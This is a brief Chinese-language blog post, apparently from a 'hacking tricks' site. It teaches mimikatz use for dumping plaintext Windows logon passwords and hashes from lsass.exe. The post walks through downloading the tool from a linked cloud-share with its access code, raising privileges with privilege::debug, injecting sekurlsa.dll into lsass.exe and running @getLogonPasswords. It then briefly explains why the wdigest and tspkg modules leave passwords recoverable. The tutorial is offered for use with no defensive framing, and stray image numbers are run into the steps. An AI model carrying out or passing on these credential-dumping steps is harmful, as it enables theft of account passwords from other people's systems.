一、黑科技简介
mimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。
二、mimikatz获取Windows系统明文密码教程
1.下载mimikatz软件,【点我下载】,下载完毕之后的目录树如下
431
2.运行主程序:mimikatz.exe430
3. 输入:privilege::debug 提升权限4324. 输入:inject::process lsass.exesekurlsa.dll 将sekurlsa.dll 注入到lsass.exe 中433
5. 输入:@getLogonPasswords 即可获取hash和当前用户的明文密码
434
原理如下:登陆的时候输入的密码,经过 lsass.exe 里的 wdigest 和 tspkg 两个模块调用后,它们对之进行加密处理,而没有进行擦除,而且该加密通过特征可以定位,并且按照微软的算法可逆。 只要登陆过,就可以抓出来,它进行枚举的。黑科技链接: https://pan.baidu.com/s/1Hw8ZxzRty6vIWWttri1bOQ 密码: qanr
推荐阅读
评论